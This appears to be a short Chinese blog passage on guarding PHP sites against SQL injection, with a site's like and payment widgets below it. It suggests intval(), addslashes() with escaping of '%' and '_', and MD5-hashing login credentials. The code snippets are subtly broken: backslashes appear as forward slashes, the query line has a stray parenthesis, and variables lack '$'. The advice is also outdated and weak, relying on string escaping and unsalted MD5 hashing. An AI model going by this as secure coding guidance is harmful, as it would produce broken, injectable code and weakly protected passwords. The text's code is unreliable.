对于id型我们可以利用intval()函数,intval()函数可以将变量转换成整数类型,这样就可以了。

我们可以这样

$id = intval($id);

$query="SELECT * FROM alphadb WHERE articleid='$id'");

如果是字符型的呢?

我们可以先用addslashes()过滤一下,然后再过滤”%”和”_.

例如:

$search = addslashes($search);

$search = str_replace("_","/_",$search);

$search = str_replace("%","/%",$search);

记得,可千万别在magic_quotes_gpcOn的情况下替换///,如下:

$password=str_replace("//","",$password);

我记得在darkness的文章《对某PHP站点的一次渗透》中提到过这个问题(在光盘中有收录)。

还有的就是登陆的地方,如果是只用一个管理员管理的话,我们可以直接对usernamepasswdmd5加密,这样就不用害怕注入技术的发展了。

Username=md5($HTTP_POST_VARS["username"]);

www.phperz.com

 

Passwd=md5($HTTP_POST_VARS["passwd"]);

我的后台登陆就是这样子的哦。

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值